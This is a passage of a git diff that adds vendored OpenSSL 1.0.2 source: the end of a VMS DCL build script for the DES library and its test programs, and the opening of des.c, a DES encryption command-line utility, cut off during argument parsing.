+$   WRITE SYS$OUTPUT ""
+$!
+$!  Exit The Build.
+$!
+$   EXIT
+$!
+$! End The File Exists Check.
+$!
+$ ENDIF
+$!
+$! Compile The File.
+$!
+$ ON ERROR THEN GOTO NEXT_FILE
+$ CC/OBJECT='OBJECT_FILE' 'SOURCE_FILE'
+$!
+$! Add It To The Library.
+$!
+$ LIBRARY/REPLACE/OBJECT 'LIB_NAME' 'OBJECT_FILE'
+$!
+$! Time To Clean Up The Object File.
+$!
+$ DELETE 'OBJECT_FILE';*
+$!
+$! Go Back And Do It Again.
+$!
+$ GOTO NEXT_FILE
+$!
+$! All Done With This Library Part.
+$!
+$ FILE_DONE:
+$!
+$! Tell The User That We Are All Done.
+$!
+$ WRITE SYS$OUTPUT "Library ",LIB_NAME," Built."
+$!
+$! All Done, Time To Return.
+$!
+$ RETURN
+$!
+$!  Compile The DESTEST Program.
+$!
+$ DESTEST:
+$!
+$! Check To See If We Have The Proper Libraries.
+$!
+$ GOSUB LIB_CHECK
+$!
+$! Check To See If We Have A Linker Option File.
+$!
+$ GOSUB CHECK_OPT_FILE
+$!
+$! Check To See If The File We Want To Compile Actually Exists.
+$!
+$ IF (F$SEARCH("SYS$DISK:[]DESTEST.C").EQS."")
+$ THEN
+$!
+$!  Tell The User That The File Dosen't Exist.
+$!
+$   WRITE SYS$OUTPUT ""
+$   WRITE SYS$OUTPUT "The File DESTEST.C Dosen't Exist."
+$   WRITE SYS$OUTPUT ""
+$!
+$!  Exit The Build.
+$!
+$   EXIT
+$!
+$! End The DESTEST.C File Check.
+$!
+$ ENDIF
+$!
+$! Tell The User What We Are Building.
+$!
+$ WRITE SYS$OUTPUT "Building ",EXE_DIR,"DESTEST.EXE"
+$!
+$! Compile The DESTEST Program.
+$!
+$ CC/OBJECT='OBJ_DIR'DESTEST.OBJ SYS$DISK:[]DESTEST.C
+$!
+$! Link The DESTEST Program.
+$!
+$ LINK/'DEBUGGER'/'TRACEBACK'/CONTIGUOUS/EXE='EXE_DIR'DESTEST.EXE -
+      'OBJ_DIR'DESTEST.OBJ,'LIB_NAME'/LIBRARY,'OPT_FILE'/OPTION
+$!
+$! All Done, Time To Return.
+$!
+$ RETURN
+$!
+$!  Compile The SPEED Program.
+$!
+$ SPEED:
+$!
+$! Check To See If We Have The Proper Libraries.
+$!
+$ GOSUB LIB_CHECK
+$!
+$! Check To See If We Have A Linker Option File.
+$!
+$ GOSUB CHECK_OPT_FILE
+$!
+$! Check To See If The File We Want To Compile Actually Exists.
+$!
+$ IF (F$SEARCH("SYS$DISK:[]SPEED.C").EQS."")
+$ THEN
+$!
+$!  Tell The User That The File Dosen't Exist.
+$!
+$   WRITE SYS$OUTPUT ""
+$   WRITE SYS$OUTPUT "The File SPEED.C Dosen't Exist."
+$   WRITE SYS$OUTPUT ""
+$!
+$!  Exit The Build.
+$!
+$   EXIT
+$!
+$! End The SPEED.C File Check.
+$!
+$ ENDIF
+$!
+$! Tell The User What We Are Building.
+$!
+$ WRITE SYS$OUTPUT "Building ",EXE_DIR,"SPEED.EXE"
+$!
+$! Compile The SPEED Program.
+$!
+$ CC/OBJECT='OBJ_DIR'SPEED.OBJ SYS$DISK:[]SPEED.C
+$!
+$! Link The SPEED Program.
+$!
+$ LINK/'DEBUGGER'/'TRACEBACK'/CONTIGUOUS/EXE='EXE_DIR'SPEED.EXE -
+      'OBJ_DIR'SPEED.OBJ,'LIB_NAME'/LIBRARY,'OPT_FILE'/OPTION
+$!
+$! All Done, Time To Return.
+$!
+$ RETURN
+$!
+$!  Compile The RPW Program.
+$!
+$ RPW:
+$!
+$! Check To See If We Have The Proper Libraries.
+$!
+$ GOSUB LIB_CHECK
+$!
+$! Check To See If We Have A Linker Option File.
+$!
+$ GOSUB CHECK_OPT_FILE
+$!
+$! Check To See If The File We Want To Compile Actually Exists.
+$!
+$ IF (F$SEARCH("SYS$DISK:[]RPW.C").EQS."")
+$ THEN
+$!
+$!  Tell The User That The File Dosen't Exist.
+$!
+$   WRITE SYS$OUTPUT ""
+$   WRITE SYS$OUTPUT "The File RPW.C Dosen't Exist."
+$   WRITE SYS$OUTPUT ""
+$!
+$!  Exit The Build.
+$!
+$   EXIT
+$!
+$! End The RPW.C File Check.
+$!
+$ ENDIF
+$!
+$! Tell The User What We Are Building.
+$!
+$ WRITE SYS$OUTPUT "Building ",EXE_DIR,"RPW.EXE"
+$!
+$! Compile The RPW Program.
+$!
+$ CC/OBJECT='OBJ_DIR'RPW.OBJ SYS$DISK:[]RPW.C
+$!
+$! Link The RPW Program.
+$!
+$ LINK/'DEBUGGER'/'TRACEBACK'/CONTIGUOUS/EXE='EXE_DIR'RPW.EXE -
+      'OBJ_DIR'RPW.OBJ,'LIB_NAME'/LIBRARY,'OPT_FILE'/OPTION
+$!
+$! All Done, Time To Return.
+$!
+$ RETURN
+$!
+$!  Compile The DES Program.
+$!
+$ DES:
+$!
+$! Check To See If We Have The Proper Libraries.
+$!
+$ GOSUB LIB_CHECK
+$!
+$! Check To See If We Have A Linker Option File.
+$!
+$ GOSUB CHECK_OPT_FILE
+$!
+$! Check To See If The File We Want To Compile Actually Exists.
+$!
+$ IF (F$SEARCH("SYS$DISK:[]DES.C").EQS."")
+$ THEN
+$!
+$!  Tell The User That The File Dosen't Exist.
+$!
+$   WRITE SYS$OUTPUT ""
+$   WRITE SYS$OUTPUT "The File DES.C Dosen't Exist."
+$   WRITE SYS$OUTPUT ""
+$!
+$!  Exit The Build.
+$!
+$   EXIT
+$!
+$! End The DES.C File Check.
+$!
+$ ENDIF
+$!
+$! Tell The User What We Are Building.
+$!
+$ WRITE SYS$OUTPUT "Building ",EXE_DIR,"DES.EXE"
+$!
+$! Compile The DES Program.
+$!
+$ CC/OBJECT='OBJ_DIR'DES.OBJ SYS$DISK:[]DES.C
+$ CC/OBJECT='OBJ_DIR'DES.OBJ SYS$DISK:[]CBC3_ENC.C
+$!
+$! Link The DES Program.
+$!
+$ LINK/'DEBUGGER'/'TRACEBACK'/CONTIGUOUS/EXE='EXE_DIR'DES.EXE -
+      'OBJ_DIR'DES.OBJ,'OBJ_DIR'CBC3_ENC.OBJ,-
+      'LIB_NAME'/LIBRARY,'OPT_FILE'/OPTION
+$!
+$! All Done, Time To Return.
+$!
+$ RETURN
+$!
+$!  Compile The DES_OPTS Program.
+$!
+$ DES_OPTS:
+$!
+$! Check To See If We Have The Proper Libraries.
+$!
+$ GOSUB LIB_CHECK
+$!
+$! Check To See If We Have A Linker Option File.
+$!
+$ GOSUB CHECK_OPT_FILE
+$!
+$! Check To See If The File We Want To Compile Actually Exists.
+$!
+$ IF (F$SEARCH("SYS$DISK:[]DES_OPTS.C").EQS."")
+$ THEN
+$!
+$!  Tell The User That The File Dosen't Exist.
+$!
+$   WRITE SYS$OUTPUT ""
+$   WRITE SYS$OUTPUT "The File DES_OPTS.C Dosen't Exist."
+$   WRITE SYS$OUTPUT ""
+$!
+$!  Exit The Build.
+$!
+$   EXIT
+$!
+$! End The DES_OPTS.C File Check.
+$!
+$ ENDIF
+$!
+$! Tell The User What We Are Building.
+$!
+$ WRITE SYS$OUTPUT "Building ",EXE_DIR,"DES_OPTS.EXE"
+$!
+$! Compile The DES_OPTS Program.
+$!
+$ CC/OBJECT='OBJ_DIR'DES_OPTS.OBJ SYS$DISK:[]DES_OPTS.C
+$!
+$! Link The DES_OPTS Program.
+$!
+$ LINK/'DEBUGGER'/'TRACEBACK'/CONTIGUOUS/EXE='EXE_DIR'DES_OPTS.EXE -
+      'OBJ_DIR'DES_OPTS.OBJ,'LIB_NAME'/LIBRARY,'OPT_FILE'/OPTION
+$!
+$! All Done, Time To Return.
+$!
+$ RETURN
+$ EXIT
+$!
+$! Check For The Link Option FIle.
+$!
+$ CHECK_OPT_FILE:
+$!
+$! Check To See If We Need To Make A VAX C Option File.
+$!
+$ IF (COMPILER.EQS."VAXC")
+$ THEN
+$!
+$!  Check To See If We Already Have A VAX C Linker Option File.
+$!
+$   IF (F$SEARCH(OPT_FILE).EQS."")
+$   THEN
+$!
+$!    We Need A VAX C Linker Option File.
+$!
+$     CREATE 'OPT_FILE'
+$DECK
+!
+! Default System Options File To Link Agianst 
+! The Sharable VAX C Runtime Library.
+!
+SYS$SHARE:VAXCRTL.EXE/SHARE
+$EOD
+$!
+$!  End The Option File Check.
+$!
+$   ENDIF
+$!
+$! End The VAXC Check.
+$!
+$ ENDIF
+$!
+$! Check To See If We Need A GNU C Option File.
+$!
+$ IF (COMPILER.EQS."GNUC")
+$ THEN
+$!
+$!  Check To See If We Already Have A GNU C Linker Option File.
+$!
+$   IF (F$SEARCH(OPT_FILE).EQS."")
+$   THEN
+$!
+$!    We Need A GNU C Linker Option File.
+$!
+$     CREATE 'OPT_FILE'
+$DECK
+!
+! Default System Options File To Link Agianst 
+! The Sharable C Runtime Library.
+!
+GNU_CC:[000000]GCCLIB/LIBRARY
+SYS$SHARE:VAXCRTL/SHARE
+$EOD
+$!
+$!  End The Option File Check.
+$!
+$   ENDIF
+$!
+$! End The GNU C Check.
+$!
+$ ENDIF
+$!
+$! Check To See If We Need A DEC C Option File.
+$!
+$ IF (COMPILER.EQS."DECC")
+$ THEN
+$!
+$!  Check To See If We Already Have A DEC C Linker Option File.
+$!
+$   IF (F$SEARCH(OPT_FILE).EQS."")
+$   THEN
+$!
+$!    Figure Out If We Need An non-VAX Or A VAX Linker Option File.
+$!
+$     IF (F$GETSYI("CPU").LT.128)
+$     THEN
+$!
+$!      We Need A DEC C Linker Option File For VAX.
+$!
+$       CREATE 'OPT_FILE'
+$DECK
+!
+! Default System Options File To Link Agianst 
+! The Sharable DEC C Runtime Library.
+!
+SYS$SHARE:DECC$SHR.EXE/SHARE
+$EOD
+$!
+$!    Else...
+$!
+$     ELSE
+$!
+$!      Create The non-VAX Linker Option File.
+$!
+$       CREATE 'OPT_FILE'
+$DECK
+!
+! Default System Options File For non-VAX To Link Agianst 
+! The Sharable C Runtime Library.
+!
+SYS$SHARE:CMA$OPEN_LIB_SHR/SHARE
+SYS$SHARE:CMA$OPEN_RTL/SHARE
+$EOD
+$!
+$!    End The DEC C Option File Check.
+$!
+$     ENDIF
+$!
+$!  End The Option File Search.
+$!
+$   ENDIF
+$!
+$! End The DEC C Check.
+$!
+$ ENDIF
+$!
+$!  Tell The User What Linker Option File We Are Using.
+$!
+$ WRITE SYS$OUTPUT "Using Linker Option File ",OPT_FILE,"."	
+$!
+$! Time To RETURN.
+$!
+$ RETURN
+$!
+$! Library Check.
+$!
+$ LIB_CHECK:
+$!
+$!  Look For The Library LIBDES.OLB.
+$!
+$ IF (F$SEARCH(LIB_NAME).EQS."")
+$ THEN
+$!
+$!    Tell The User We Can't Find The [.xxx.CRYPTO.DES]LIBDES.OLB Library.
+$!
+$   WRITE SYS$OUTPUT ""
+$   WRITE SYS$OUTPUT "Can't Find The Library ",LIB_NAME,"."
+$   WRITE SYS$OUTPUT "We Can't Link Without It."
+$   WRITE SYS$OUTPUT ""
+$!
+$!    Since We Can't Link Without It, Exit.
+$!
+$   EXIT
+$ ENDIF
+$!
+$! Time To Return.
+$!
+$ RETURN
+$!
+$! Check The User's Options.
+$!
+$ CHECK_OPTIONS:
+$!
+$! Check To See If We Are To "Just Build Everything".
+$!
+$ IF (P1.EQS."ALL")
+$ THEN
+$!
+$!   P1 Is "ALL", So Build Everything.
+$!
+$    BUILDALL = "TRUE"
+$!
+$! Else...
+$!
+$ ELSE
+$!
+$!  Else, Check To See If P1 Has A Valid Argument.
+$!
+$   IF (P1.EQS."LIBRARY").OR.(P1.EQS."DESTEST").OR.(P1.EQS."SPEED") -
+       .OR.(P1.EQS."RPW").OR.(P1.EQS."DES").OR.(P1.EQS."DES_OPTS")
+$   THEN
+$!
+$!    A Valid Argument.
+$!
+$     BUILDALL = P1
+$!
+$!  Else...
+$!
+$   ELSE
+$!
+$!    Tell The User We Don't Know What They Want.
+$!
+$     WRITE SYS$OUTPUT ""
+$     WRITE SYS$OUTPUT "The Option ",P1," Is Invalid.  The Valid Options Are:"
+$     WRITE SYS$OUTPUT ""
+$     WRITE SYS$OUTPUT "    ALL      :  Just Build Everything."
+$     WRITE SYS$OUTPUT "    LIBRARY  :  To Compile Just The [.xxx.EXE.CRYPTO.DES]LIBDES.OLB Library."
+$     WRITE SYS$OUTPUT "    DESTEST  :  To Compile Just The [.xxx.EXE.CRYPTO.DES]DESTEST.EXE Program."
+$     WRITE SYS$OUTPUT "    SPEED    :  To Compile Just The [.xxx.EXE.CRYPTO.DES]SPEED.EXE Program."
+$     WRITE SYS$OUTPUT "    RPW      :  To Compile Just The [.xxx.EXE.CRYPTO.DES]RPW.EXE Program."
+$     WRITE SYS$OUTPUT "    DES      :  To Compile Just The [.xxx.EXE.CRYPTO.DES]DES.EXE Program."
+$     WRITE SYS$OUTPUT "    DES_OPTS :  To Compile Just The [.xxx.EXE.CRYTPO.DES]DES_OPTS.EXE Program."
+$     WRITE SYS$OUTPUT ""
+$     WRITE SYS$OUTPUT " Where 'xxx' Stands For: "
+$     WRITE SYS$OUTPUT ""
+$     WRITE SYS$OUTPUT "    ALPHA    :  Alpha Architecture."
+$     WRITE SYS$OUTPUT "    IA64     :  IA64 Architecture."
+$     WRITE SYS$OUTPUT "    VAX      :  VAX Architecture."
+$     WRITE SYS$OUTPUT ""
+$!
+$!    Time To EXIT.
+$!
+$     EXIT
+$!
+$!  End The Valid Argument Check.
+$!
+$   ENDIF
+$!
+$! End The P1 Check.
+$!
+$ ENDIF
+$!
+$! Check To See If We Are To Compile Without Debugger Information.
+$!
+$ IF (P2.EQS."NODEBUG")
+$ THEN
+$!
+$!   P2 Is Blank, So Compile Without Debugger Information.
+$!
+$    DEBUGGER  = "NODEBUG"
+$    TRACEBACK = "NOTRACEBACK" 
+$    GCC_OPTIMIZE = "OPTIMIZE"
+$    CC_OPTIMIZE = "OPTIMIZE"
+$    WRITE SYS$OUTPUT "No Debugger Information Will Be Produced During Compile."
+$    WRITE SYS$OUTPUT "Compiling With Compiler Optimization."
+$!
+$! Else...
+$!
+$ ELSE
+$!
+$!  Check To See If We Are To Compile With Debugger Information.
+$!
+$   IF (P2.EQS."DEBUG")
+$   THEN
+$!
+$!    Compile With Debugger Information.
+$!
+$     DEBUGGER  = "DEBUG"
+$     TRACEBACK = "TRACEBACK"
+$     GCC_OPTIMIZE = "NOOPTIMIZE"
+$     CC_OPTIMIZE = "NOOPTIMIZE"
+$     WRITE SYS$OUTPUT "Debugger Information Will Be Produced During Compile."
+$     WRITE SYS$OUTPUT "Compiling Without Compiler Optimization."
+$!
+$!  Else...
+$!
+$   ELSE
+$!
+$!    Tell The User Entered An Invalid Option..
+$!
+$     WRITE SYS$OUTPUT ""
+$     WRITE SYS$OUTPUT "The Option ",P2," Is Invalid.  The Valid Options Are:"
+$     WRITE SYS$OUTPUT ""
+$     WRITE SYS$OUTPUT "    DEBUG    :  Compile With The Debugger Information."
+$     WRITE SYS$OUTPUT "    NODEBUG  :  Compile Without The Debugger Information."
+$     WRITE SYS$OUTPUT ""
+$!
+$!    Time To EXIT.
+$!
+$     EXIT
+$!
+$!  End The Valid Argument Check.
+$!
+$   ENDIF
+$!
+$! End The P2 Check.
+$!
+$ ENDIF
+$!
+$! Special Threads For OpenVMS v7.1 Or Later.
+$!
+$! Written By:  Richard Levitte
+$!              richard@levitte.org
+$!
+$!
+$! Check To See If We Have A Option For P4.
+$!
+$ IF (P4.EQS."")
+$ THEN
+$!
+$!  Get The Version Of VMS We Are Using.
+$!
+$   ISSEVEN := ""
+$   TMP = F$ELEMENT(0,"-",F$EXTRACT(1,4,F$GETSYI("VERSION")))
+$   TMP = F$INTEGER(F$ELEMENT(0,".",TMP)+F$ELEMENT(1,".",TMP))
+$!
+$!  Check To See If The VMS Version Is v7.1 Or Later.
+$!
+$   IF (TMP.GE.71)
+$   THEN
+$!
+$!    We Have OpenVMS v7.1 Or Later, So Use The Special Threads.
+$!
+$     ISSEVEN := ,PTHREAD_USE_D4
+$!
+$!  End The VMS Version Check.
+$!
+$   ENDIF
+$!
+$! End The P4 Check.
+$!
+$ ENDIF
+$!
+$! Check To See If P3 Is Blank.
+$!
+$ IF (P3.EQS."")
+$ THEN
+$!
+$!  O.K., The User Didn't Specify A Compiler, Let's Try To
+$!  Find Out Which One To Use.
+$!
+$!  Check To See If We Have GNU C.
+$!
+$   IF (F$TRNLNM("GNU_CC").NES."")
+$   THEN
+$!
+$!    Looks Like GNUC, Set To Use GNUC.
+$!
+$     P3 = "GNUC"
+$!
+$!  Else...
+$!
+$   ELSE
+$!
+$!    Check To See If We Have VAXC Or DECC.
+$!
+$     IF (ARCH.NES."VAX").OR.(F$TRNLNM("DECC$CC_DEFAULT").NES."")
+$     THEN 
+$!
+$!      Looks Like DECC, Set To Use DECC.
+$!
+$       P3 = "DECC"
+$!
+$!    Else...
+$!
+$     ELSE
+$!
+$!      Looks Like VAXC, Set To Use VAXC.
+$!
+$       P3 = "VAXC"
+$!
+$!    End The VAXC Compiler Check.
+$!
+$     ENDIF
+$!
+$!  End The DECC & VAXC Compiler Check.
+$!
+$   ENDIF
+$!
+$!  End The Compiler Check.
+$!
+$ ENDIF
+$!
+$! Set Up Initial CC Definitions, Possibly With User Ones
+$!
+$ CCDEFS = ""
+$ IF F$TYPE(USER_CCDEFS) .NES. "" THEN CCDEFS = USER_CCDEFS
+$ CCEXTRAFLAGS = ""
+$ IF F$TYPE(USER_CCFLAGS) .NES. "" THEN CCEXTRAFLAGS = USER_CCFLAGS
+$ CCDISABLEWARNINGS = ""
+$ IF F$TYPE(USER_CCDISABLEWARNINGS) .NES. "" THEN -
+	CCDISABLEWARNINGS = USER_CCDISABLEWARNINGS
+$!
+$!  Check To See If The User Entered A Valid Paramter.
+$!
+$ IF (P3.EQS."VAXC").OR.(P3.EQS."DECC").OR.(P3.EQS."GNUC")
+$ THEN
+$!
+$!    Check To See If The User Wanted DECC.
+$!
+$   IF (P3.EQS."DECC")
+$   THEN
+$!
+$!    Looks Like DECC, Set To Use DECC.
+$!
+$     COMPILER = "DECC"
+$!
+$!    Tell The User We Are Using DECC.
+$!
+$     WRITE SYS$OUTPUT "Using DECC 'C' Compiler."
+$!
+$!    Use DECC...
+$!
+$     CC = "CC"
+$     IF ARCH.EQS."VAX" .AND. F$TRNLNM("DECC$CC_DEFAULT").NES."/DECC" -
+	 THEN CC = "CC/DECC"
+$     CC = CC + "/''CC_OPTIMIZE'/''DEBUGGER'/STANDARD=ANSI89" + -
+           "/NOLIST/PREFIX=ALL" + CCEXTRAFLAGS
+$!
+$!    Define The Linker Options File Name.
+$!
+$     OPT_FILE = "''EXE_DIR'VAX_DECC_OPTIONS.OPT"
+$!
+$!  End DECC Check.
+$!
+$   ENDIF
+$!
+$!  Check To See If We Are To Use VAXC.
+$!
+$   IF (P3.EQS."VAXC")
+$   THEN
+$!
+$!    Looks Like VAXC, Set To Use VAXC.
+$!
+$     COMPILER = "VAXC"
+$!
+$!    Tell The User We Are Using VAX C.
+$!
+$     WRITE SYS$OUTPUT "Using VAXC 'C' Compiler."
+$!
+$!    Compile Using VAXC.
+$!
+$     CC = "CC"
+$     IF ARCH.NES."VAX"
+$     THEN
+$	WRITE SYS$OUTPUT "There is no VAX C on ''ARCH'!"
+$	EXIT
+$     ENDIF
+$     IF F$TRNLNM("DECC$CC_DEFAULT").EQS."/DECC" THEN CC = "CC/VAXC"
+$     CC = CC + "/''CC_OPTIMIZE'/''DEBUGGER'/NOLIST" + CCEXTRAFLAGS
+$     CCDEFS = """VAXC""," + CCDEFS
+$!
+$!    Define <sys> As SYS$COMMON:[SYSLIB]
+$!
+$     DEFINE/NOLOG SYS SYS$COMMON:[SYSLIB]
+$!
+$!    Define The Linker Options File Name.
+$!
+$     OPT_FILE = "''EXE_DIR'VAX_VAXC_OPTIONS.OPT"
+$!
+$!  End VAXC Check
+$!
+$   ENDIF
+$!
+$!  Check To See If We Are To Use GNU C.
+$!
+$   IF (P3.EQS."GNUC")
+$   THEN
+$!
+$!    Looks Like GNUC, Set To Use GNUC.
+$!
+$     COMPILER = "GNUC"
+$!
+$!    Tell The User We Are Using GNUC.
+$!
+$     WRITE SYS$OUTPUT "Using GNU 'C' Compiler."
+$!
+$!    Use GNU C...
+$!
+$     CC = "GCC/NOCASE_HACK/''GCC_OPTIMIZE'/''DEBUGGER'/NOLIST" + CCEXTRAFLAGS
+$!
+$!    Define The Linker Options File Name.
+$!
+$     OPT_FILE = "''EXE_DIR'VAX_GNUC_OPTIONS.OPT"
+$!
+$!  End The GNU C Check.
+$!
+$   ENDIF
+$!
+$!  Set up default defines
+$!
+$   CCDEFS = """FLAT_INC=1""," + CCDEFS
+$!
+$!  Finish up the definition of CC.
+$!
+$   IF COMPILER .EQS. "DECC"
+$   THEN
+$     IF CCDISABLEWARNINGS .EQS. ""
+$     THEN
+$       CC4DISABLEWARNINGS = "DOLLARID"
+$     ELSE
+$       CC4DISABLEWARNINGS = CCDISABLEWARNINGS + ",DOLLARID"
+$       CCDISABLEWARNINGS = "/WARNING=(DISABLE=(" + CCDISABLEWARNINGS + "))"
+$     ENDIF
+$     CC4DISABLEWARNINGS = "/WARNING=(DISABLE=(" + CC4DISABLEWARNINGS + "))"
+$   ELSE
+$     CCDISABLEWARNINGS = ""
+$     CC4DISABLEWARNINGS = ""
+$   ENDIF
+$   CC = CC + "/DEFINE=(" + CCDEFS + ")" + CCDISABLEWARNINGS
+$!
+$!  Show user the result
+$!
+$   WRITE SYS$OUTPUT "Main Compiling Command: ",CC
+$!
+$!  Else The User Entered An Invalid Argument.
+$!
+$ ELSE
+$!
+$!  Tell The User We Don't Know What They Want.
+$!
+$   WRITE SYS$OUTPUT ""
+$   WRITE SYS$OUTPUT "The Option ",P3," Is Invalid.  The Valid Options Are:"
+$   WRITE SYS$OUTPUT ""
+$   WRITE SYS$OUTPUT "    VAXC  :  To Compile With VAX C."
+$   WRITE SYS$OUTPUT "    DECC  :  To Compile With DEC C."
+$   WRITE SYS$OUTPUT "    GNUC  :  To Compile With GNU C."
+$   WRITE SYS$OUTPUT ""
+$!
+$!  Time To EXIT.
+$!
+$   EXIT
+$!
+$! End The P3 Check.
+$!
+$ ENDIF
+$!
+$!  Time To RETURN...
+$!
+$ RETURN
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/des.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/des.c
new file mode 100644
index 0000000..2bff281
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/des.c
@@ -0,0 +1,866 @@
+/* crypto/des/des.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <openssl/opensslconf.h>
+#ifndef OPENSSL_SYS_MSDOS
+# ifndef OPENSSL_SYS_VMS
+#  include OPENSSL_UNISTD
+# else                          /* OPENSSL_SYS_VMS */
+#  ifdef __DECC
+#   include <unistd.h>
+#  else                         /* not __DECC */
+#   include <math.h>
+#  endif                        /* __DECC */
+# endif                         /* OPENSSL_SYS_VMS */
+#else                           /* OPENSSL_SYS_MSDOS */
+# include <io.h>
+#endif
+
+#include <time.h>
+#include "des_ver.h"
+
+#ifdef OPENSSL_SYS_VMS
+# include <types.h>
+# include <stat.h>
+#else
+# ifndef _IRIX
+#  include <sys/types.h>
+# endif
+# include <sys/stat.h>
+#endif
+#include <openssl/des.h>
+#include <openssl/rand.h>
+#include <openssl/ui_compat.h>
+
+void usage(void);
+void doencryption(void);
+int uufwrite(unsigned char *data, int size, unsigned int num, FILE *fp);
+void uufwriteEnd(FILE *fp);
+int uufread(unsigned char *out, int size, unsigned int num, FILE *fp);
+int uuencode(unsigned char *in, int num, unsigned char *out);
+int uudecode(unsigned char *in, int num, unsigned char *out);
+void DES_3cbc_encrypt(DES_cblock *input, DES_cblock *output, long length,
+                      DES_key_schedule sk1, DES_key_schedule sk2,
+                      DES_cblock *ivec1, DES_cblock *ivec2, int enc);
+#ifdef OPENSSL_SYS_VMS
+# define EXIT(a) exit(a&0x10000000L)
+#else
+# define EXIT(a) exit(a)
+#endif
+
+#define BUFSIZE (8*1024)
+#define VERIFY  1
+#define KEYSIZ  8
+#define KEYSIZB 1024            /* should hit tty line limit first :-) */
+char key[KEYSIZB + 1];
+int do_encrypt, longk = 0;
+FILE *DES_IN, *DES_OUT, *CKSUM_OUT;
+char uuname[200];
+unsigned char uubuf[50];
+int uubufnum = 0;
+#define INUUBUFN        (45*100)
+#define OUTUUBUF        (65*100)
+unsigned char b[OUTUUBUF];
+unsigned char bb[300];
+DES_cblock cksum = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 };
+
+char cksumname[200] = "";
+
+int vflag, cflag, eflag, dflag, kflag, bflag, fflag, sflag, uflag, flag3,
+    hflag, error;
+
+int main(int argc, char **argv)
+{
+    int i;
+    struct stat ins, outs;
+    char *p;
+    char *in = NULL, *out = NULL;
+
+    vflag = cflag = eflag = dflag = kflag = hflag = bflag = fflag = sflag =
+        uflag = flag3 = 0;
+    error = 0;
+    memset(key, 0, sizeof(key));
+
+    for (i = 1; i < argc; i++) {
+        p = argv[i];
+        if ((p[0] == '-') && (p[1] != '\0')) {
+            p++;
+            while (*p) {
+                switch (*(p++)) {
+                case '3':
+                    flag3 = 1;
+                    longk = 1;
+                    break;
+                case 'c':
+                    cflag = 1;
+                    strncpy(cksumname, p, 200);
+                    cksumname[sizeof(cksumname) - 1] = '\0';
+                    p += strlen(cksumname);
+                    break;
+                case 'C':
+                    cflag = 1;
+                    longk = 1;
+                    strncpy(cksumname, p, 200);
+                    cksumname[sizeof(cksumname) - 1] = '\0';
+                    p += strlen(cksumname);
+                    break;
+                case 'e':
+                    eflag = 1;
+                    break;
+                case 'v':
+                    vflag = 1;
+                    break;
+                case 'E':
+                    eflag = 1;
+                    longk = 1;
+                    break;
+                case 'd':
+                    dflag = 1;
+                    break;
+                case 'D':
+                    dflag = 1;
+                    longk = 1;
+                    break;
+                case 'b':
+                    bflag = 1;
+                    break;
+                case 'f':
+                    fflag = 1;
+                    break;
+                case 's':
+                    sflag = 1;
+                    break;
+                case 'u':
+                    uflag = 1;
+                    strncpy(uuname, p, 200);
+                    uuname[sizeof(uuname) - 1] = '\0';
+                    p += strlen(uuname);
+                    break;
+                case 'h':
+                    hflag = 1;
+                    break;
+                case 'k':
+                    kflag = 1;
+                    if ((i + 1) == argc) {
+                        fputs("must have a key with the -k option\n", stderr);
+                        error = 1;
+                    } else {
+                        int j;
+
+                        i++;
+                        strncpy(key, argv[i], KEYSIZB);
+                        for (j = strlen(argv[i]) - 1; j >= 0; j--)
+                            argv[i][j] = '\0';
+                    }
+                    break;
+                default:
+                    fprintf(stderr, "'%c' unknown flag\n", p[-1]);
+                    error = 1;
+                    break;
+                }
+            }
+        } else {
+            if (in == NULL)
